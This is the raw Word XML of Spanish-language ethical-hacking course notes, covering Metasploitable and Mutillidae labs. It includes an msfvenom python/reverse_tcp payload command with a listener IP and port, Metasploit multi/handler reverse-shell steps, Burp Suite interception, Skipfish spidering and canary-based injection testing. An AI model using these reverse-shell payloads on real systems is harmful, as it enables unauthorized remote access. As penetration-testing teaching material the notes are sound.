        <w:t>En este ejemplo, ya estaríamos dentro de la máquina de Ubuntu Metasploiteable.</w:t>
      </w:r>
      <w:r w:rsidR="0022068B">
        <w:t xml:space="preserve"> Para salir de la sesión. Usamos </w:t>
      </w:r>
      <w:r w:rsidR="0022068B" w:rsidRPr="0022068B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">exit </w:t>
      </w:r>
      <w:r w:rsidR="0022068B">
        <w:t xml:space="preserve">seguido de </w:t>
      </w:r>
      <w:r w:rsidR="0022068B" w:rsidRPr="0022068B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CTRL+C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCCE68B" w14:textId="27B4808D" w:rsidR="00BA62B8" w:rsidRDefault="008776A5" w:rsidP="00BA62B8">
      <w:r w:rsidRPr="008776A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Msfvenom:</w:t>
      </w:r>
      <w:r w:rsidRPr="008776A5">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Módulo de Metasploit para la creación de payloads personalizados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B46867" w14:textId="2AD191F1" w:rsidR="007501EE" w:rsidRDefault="007501EE" w:rsidP="00BA62B8">
      <w:r>
        <w:t>Puede preparar payloads directamente del repositorio de Metasploit para diferentes Sistemas Operativos como Windows, IOs, Android…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CF46BA" w14:textId="21E4B00A" w:rsidR="000C5DF5" w:rsidRDefault="007501EE" w:rsidP="00BA62B8">
      <w:r>
        <w:t>Muy fácilmente identificable por los antivirus.</w:t>
      </w:r>
      <w:r w:rsidR="000C5DF5">
        <w:t xml:space="preserve"> Por ejemplo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5957D5" w14:textId="76366CF2" w:rsidR="00EB694B" w:rsidRDefault="000C5DF5" w:rsidP="00BA62B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="000C5DF5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sfvenom -p  </w:t>
      </w:r>
      <w:r w:rsidR="009F2F63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="000C5DF5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ython/reverse_tcp -lhost=192.168.1.133 -lport:4444 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C528F7F" w14:textId="393D88E9" w:rsidR="00EB694B" w:rsidRPr="00C94F51" w:rsidRDefault="00EB694B" w:rsidP="00BA62B8">
      <w:r w:rsidRPr="00C94F51">
        <w:t>Es interesante mencionar que si usamos un payload más complejo, como un meterpreter, es necesario dejar un handler en Metasploit a la escucha,para que a la hora de hacer una Shell inversa, pueda “coger el testigo”, eso es el Handler de Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9B663A" w14:textId="62A1D7D4" w:rsidR="00EB694B" w:rsidRPr="00C94F51" w:rsidRDefault="00EB694B" w:rsidP="00BA62B8">
      <w:r w:rsidRPr="00C94F51">
        <w:t>Para ello, desde Metasploit hacemos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E1C2FE" w14:textId="60A5741B" w:rsidR="00EB694B" w:rsidRDefault="00EB694B" w:rsidP="00BA62B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>use /multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46640F7E" w14:textId="42A6C9C5" w:rsidR="00EB694B" w:rsidRDefault="00EB694B" w:rsidP="00BA62B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:r w:rsidR="00C94F51">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>los (nuestra ip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1397683B" w14:textId="1ED2272D" w:rsidR="00C94F51" w:rsidRDefault="00C94F51" w:rsidP="00BA62B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>set payload (mismo payload que hayamos programado en el anterior caso)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F35A908" w14:textId="58D60CBA" w:rsidR="00C94F51" w:rsidRDefault="00C94F51" w:rsidP="00BA62B8">
      <w:r w:rsidRPr="00C94F51">
        <w:t>Al usar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94F51">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C94F51">
        <w:t>quedará a la espera de recibir la conexión</w:t>
      </w:r>
      <w:r w:rsidR="00016126">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B325D2" w14:textId="715D431D" w:rsidR="00016126" w:rsidRPr="00C94F51" w:rsidRDefault="00016126" w:rsidP="00BA62B8">
      <w:r>
        <w:t>Simplemente, si ejecutamos nuestro payload (usando Python desde nuestra máquina) ya debería recibir la conexión y abrir el meterpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62394176" w14:textId="22552547" w:rsidR="007501EE" w:rsidRPr="007D2DC3" w:rsidRDefault="007D2DC3" w:rsidP="00BA62B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D2DC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Armitage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4046860D" w14:textId="598C1D3D" w:rsidR="007F187B" w:rsidRDefault="007F187B" w:rsidP="00BA62B8">
      <w:r>
        <w:t>Interfaz gráfica de Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FB64C3" w14:textId="5DEBF5EE" w:rsidR="0022068B" w:rsidRDefault="007D2DC3" w:rsidP="00BA62B8">
      <w:r>
        <w:t>Para instalar Armitage en las versiones actuales:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A59C45" w14:textId="76F3055C" w:rsidR="007D2DC3" w:rsidRPr="007D2DC3" w:rsidRDefault="007D2DC3" w:rsidP="00BA62B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="007D2DC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>udo apt install Armitage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327F1FFC" w14:textId="6166DF98" w:rsidR="007D2DC3" w:rsidRDefault="007D2DC3" w:rsidP="00BA62B8">
      <w:r>
        <w:t>Para Iniciarlo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45650FD1" w14:textId="5CAC514C" w:rsidR="007D2DC3" w:rsidRPr="007D2DC3" w:rsidRDefault="007D2DC3" w:rsidP="00BA62B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="007D2DC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>udo service postgresql start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62583D68" w14:textId="75F6D7BC" w:rsidR="007D2DC3" w:rsidRDefault="007D2DC3" w:rsidP="00BA62B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="007D2DC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rmitage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41727F94" w14:textId="303A6B26" w:rsidR="001E1F57" w:rsidRPr="001E1F57" w:rsidRDefault="00607075" w:rsidP="00E961D1">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607075">
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">Explotación y Hacking de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Vulnerabilidades Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00607075">
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70116320" w14:textId="4C2D68D8" w:rsidR="001E1F57" w:rsidRPr="001E1F57" w:rsidRDefault="001E1F57" w:rsidP="001E1F57">
      <w:r>
        <w:t>Recomendable instalar Mutillidae, una herramienta como Metasploiteable pero con un servicio web con varias vulnerabilidades que se va actualizando cada año.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFE1CDF" w14:textId="62A5A922" w:rsidR="004A2B6E" w:rsidRDefault="004A2B6E" w:rsidP="004A2B6E">
      <w:pPr>
        <w:ind w:left="360"/>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Burp</w:t>
      </w:r>
      <w:r w:rsidR="001E1F57">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uite</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B6E">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6782864B" w14:textId="77A5D311" w:rsidR="004A2B6E" w:rsidRDefault="001E1F57" w:rsidP="004A2B6E">
      <w:r w:rsidRPr="001E1F57">
        <w:t>Burp</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1F57">
        <w:t>uite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> es una de las herramientas más usadas y extendidas para el hacking ético en vulnerabilidades web. Es un proxy http, un interceptor que puede recoger paquetes entre el servidor y el cliente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000F80B8" w14:textId="6DC9B10A" w:rsidR="001E1F57" w:rsidRDefault="001E1F57" w:rsidP="004A2B6E"/>
    <w:p w14:paraId="5DF94EA5" w14:textId="77777777" w:rsidR="001E1F57" w:rsidRDefault="001E1F57" w:rsidP="004A2B6E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D99AE30" w14:textId="1D338EC8" w:rsidR="001E1F57" w:rsidRPr="001E1F57" w:rsidRDefault="001E1F57" w:rsidP="004A2B6E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1F57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Pestaña Proxy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3ED560" w14:textId="31ED24BC" w:rsidR="001E1F57" w:rsidRDefault="001E1F57" w:rsidP="004A2B6E">
      <w:r>
        <w:t>Para que Burpsuite pueda interceptar los paquetes, es imprescindible configurarlo como proxy del navegador que estemos usando. Para ello, en la subpestaña Options, vemos que el listener es 127.0.0.1:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A70082" w14:textId="2D3FBD94" w:rsidR="001E1F57" w:rsidRPr="001E1F57" w:rsidRDefault="001E1F57" w:rsidP="004A2B6E">
      <w:r w:rsidRPr="001E1F57">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0158B52E" wp14:editId="67B5F81C">
            <wp:extent cx="5400040" cy="2952115"/>
            <wp:effectExtent l="0" t="0" r="0"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952115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="109FAB0C" w14:textId="77777777" w:rsidR="004A2B6E" w:rsidRPr="004A2B6E" w:rsidRDefault="004A2B6E" w:rsidP="004A2B6E"/>
    <w:p w14:paraId="11FA9AD6" w14:textId="26181304" w:rsidR="007D2DC3" w:rsidRDefault="00F90E32" w:rsidP="00BA62B8">
      <w:r>
        <w:t>Con esto ahora, en la configuración del proxy de nuestro navegador (en este caso usamos Firefox):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049E3F2C" w14:textId="5C98D4A4" w:rsidR="00F90E32" w:rsidRDefault="00F90E32" w:rsidP="00F90E32">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00F90E32">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F83F8A7" wp14:editId="5CFBB04A">
            <wp:extent cx="4602480" cy="4119177"/>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16678" cy="4131884"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E228E7D" w14:textId="6F65614C" w:rsidR="00F90E32" w:rsidRDefault="0049522F" w:rsidP="0049522F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Para iniciar la intercepción usamos Intercep ON.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54636D02" w14:textId="323187D6" w:rsidR="0049522F" w:rsidRDefault="0049522F" w:rsidP="0049522F">
      <w:r>
        <w:t>El resultado es que recibimos una petición con la información del servidor, podemos modificarla y continuar al usar Forward:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3134EAAB" w14:textId="2A12A15D" w:rsidR="0049522F" w:rsidRDefault="0049522F" w:rsidP="0049522F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0049522F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F6C76BF" wp14:editId="5F145520">
            <wp:extent cx="4435224" cy="2712955"/>
            <wp:effectExtent l="0" t="0" r="381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35224" cy="2712955"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C5467A" w14:textId="73A20F08" w:rsidR="0049522F" w:rsidRDefault="0049522F" w:rsidP="0049522F">
      <w:r>
        <w:t>Es recomendable activar la opción desde la subpestaña Options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B27A0B7" w14:textId="2E92507C" w:rsidR="0049522F" w:rsidRDefault="0049522F" w:rsidP="0049522F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0049522F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A40B6D3" wp14:editId="6FB28482">
            <wp:extent cx="4320914" cy="1082134"/>
            <wp:effectExtent l="0" t="0" r="381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20914" cy="1082134"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E267632" w14:textId="2279AD7A" w:rsidR="0049522F" w:rsidRDefault="0049522F" w:rsidP="0049522F">
      <w:r>
        <w:t>Esto nos permitirá, no solo que intercepte la respuesta Servidor-Cliente, sino también la petición Cliente-Servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3100DCF7" w14:textId="0929B9B0" w:rsidR="004C06F2" w:rsidRDefault="004C06F2" w:rsidP="0049522F"/>
    <w:p w14:paraId="6DAC437C" w14:textId="289CB1EE" w:rsidR="004C06F2" w:rsidRDefault="004C06F2" w:rsidP="004C06F2">
      <w:r w:rsidRPr="004C06F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Pestaña Target:</w:t>
      </w:r>
      <w:r w:rsidR="00B36107">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Burpsuite es capaz de analizar una aplicación web de manera automática </w:t>
      </w:r>
      <w:r w:rsidR="00FE6661">
        <w:t>parsea</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> el código fuente recibido de una página web. Con esa breve información identifica todos los apartados posibles para después usarlas como Targets. A este proceso se le denomina Spidering Pasivo</w:t>
      </w:r>
      <w:r w:rsidR="00FE6661">
        <w:t xml:space="preserve"> o Crawling. Los grises son descubiertos, los negros son visitados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFA7E05" w14:textId="7640BF07" w:rsidR="00FE6661" w:rsidRDefault="00FE6661" w:rsidP="00FE6661">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE6661">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="659BA4F0" wp14:editId="0400AA94">
            <wp:extent cx="3495612" cy="2225040"/>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17905" cy="2239230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CED70CC" w14:textId="2A89BF25" w:rsidR="00FE6661" w:rsidRDefault="00FE6661" w:rsidP="00FE6661">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Para hacer un Spidering Activo y descubrir más cosas sería necesario tener la versión de pago de Burpsuite o una versión anterior, cuando sí era posible hacerlo con la versión de prueba.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0176BD92" w14:textId="0BBBFC83" w:rsidR="00FE6661" w:rsidRDefault="00FE6661" w:rsidP="00FE6661">
      <w:r>
        <w:t>Sin embargo, podemos usar la herramienta Skipfish (no está relacionada con Burpsuite) para ello:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B54D34" w14:textId="7321C763" w:rsidR="00FE6661" w:rsidRDefault="00FE6661" w:rsidP="00FE6661">
      <w:r w:rsidRPr="00FE6661">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Skipfish:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6661">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Herramienta de terminal para realizar spidering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EB1088" w14:textId="636AF8AF" w:rsidR="00FE6661" w:rsidRDefault="00FE6661" w:rsidP="00FE6661">
      <w:r>
        <w:t>Para no ser tan intrusivos, evitamos hacer fuzzing con diccionarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D34FAE" w14:textId="589172BD" w:rsidR="00FE6661" w:rsidRPr="000A36E7" w:rsidRDefault="000A36E7" w:rsidP="00FE6661">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00FE6661" w:rsidRPr="000A36E7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">kipfish -YO -o </w:t>
      </w:r>
      <w:r w:rsidRPr="000A36E7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Desktop/skipfish </w:t>
      </w:r>
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r w:rsidRPr="000A36E7">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://192.168.52.134/mutillidae/index.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0F2D3BD9" w14:textId="6B2F94A7" w:rsidR="000A36E7" w:rsidRDefault="000A36E7" w:rsidP="00FE6661">
      <w:r>
        <w:t>Este proceso puede tardar bastante, va a recopilar todos los apartados de ese sitio. El resultado es un html bastante decorado que nos indicará todo lo que ha encontrado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B66BA04" w14:textId="3D071741" w:rsidR="000A36E7" w:rsidRPr="000F71ED" w:rsidRDefault="000A36E7" w:rsidP="00FE6661">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F71ED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Inyecciones de Código en Burpsuite:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5413FCB7" w14:textId="00B26B4B" w:rsidR="000A36E7" w:rsidRDefault="000A36E7" w:rsidP="00FE6661">
      <w:r>
        <w:t>Normalmente existen 3 tipos de puntos de inyección:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CAD9FC" w14:textId="77081F14" w:rsidR="000A36E7" w:rsidRDefault="000A36E7" w:rsidP="00E961D1">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Los parámetros de la cabecera (Cuando usa method GET)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9D31EA" w14:textId="06125E7B" w:rsidR="000A36E7" w:rsidRDefault="000A36E7" w:rsidP="00E961D1">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Los parámetros del body (Cuando usa method POST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BF561A" w14:textId="52DA3D00" w:rsidR="000A36E7" w:rsidRDefault="000A36E7" w:rsidP="00E961D1">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Las cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1962FB46" w14:textId="68D5EA1F" w:rsidR="000A36E7" w:rsidRDefault="00540619" w:rsidP="000A36E7">
      <w:r>
        <w:t>Podemos modificar los parámetros antes de hacer el Forward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7183A4D7" w14:textId="5EEB465F" w:rsidR="00540619" w:rsidRPr="00540619" w:rsidRDefault="00540619" w:rsidP="00540619">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00540619">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Un “</w:t>
      </w:r>
      <w:r w:rsidRPr="006517AF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>canario</w:t>
      </w:r>
      <w:r w:rsidRPr="00540619">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>” es una palabra clave que vamos a mandar para poder analizar el código de respuesta dónde hayamos metido esa palabra.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Es importante que sea sencillo, números y letras, pero no caracteres especiales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B89F1D" w14:textId="232054B6" w:rsidR="00540619" w:rsidRDefault="00540619" w:rsidP="000A36E7">
      <w:r>
        <w:t>Veasé el método:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5E8FF4" w14:textId="7E57D50C" w:rsidR="00540619" w:rsidRDefault="00540619" w:rsidP="000A36E7">
      <w:r w:rsidRPr="00540619">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39B6985F" wp14:editId="2D0044B0">
            <wp:extent cx="5044877" cy="1661304"/>
            <wp:effectExtent l="0" t="0" r="381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44877" cy="1661304"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9527A5" w14:textId="792DDC49" w:rsidR="00540619" w:rsidRDefault="00540619" w:rsidP="000A36E7">
      <w:r w:rsidRPr="00540619">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32BA336A" wp14:editId="0BD4AE42">
            <wp:extent cx="5400040" cy="1440815"/>
            <wp:effectExtent l="0" t="0" r="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1440815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F68D334" w14:textId="62FAD066" w:rsidR="00540619" w:rsidRDefault="00540619" w:rsidP="000A36E7">
      <w:r>
        <w:t>Notesé que los parámetros están coloreados de rojo y los puntos de inyección de azul. Observamos que en la respuesta del servidor (podemos usar la barra de abajo para buscar la palabra, en este caso nuestro canario es “canario”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B76819C" w14:textId="52E9F3F3" w:rsidR="00540619" w:rsidRDefault="00540619" w:rsidP="000A36E7">
      <w:r w:rsidRPr="00540619">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BC89DA7" wp14:editId="648EA702">
            <wp:extent cx="5694835" cy="4244340"/>
            <wp:effectExtent l="0" t="0" r="1270"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97572" cy="4246380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74408D70" w14:textId="2D47E6D5" w:rsidR="006517AF" w:rsidRDefault="006517AF" w:rsidP="000A36E7">
      <w:r>
        <w:t xml:space="preserve">Notesé que en este caso, no encuentra “canario_password”. En el </w:t>
      </w:r>
      <w:r w:rsidRPr="006517AF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>contexto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en el que está es un campo HTML.</w:t>
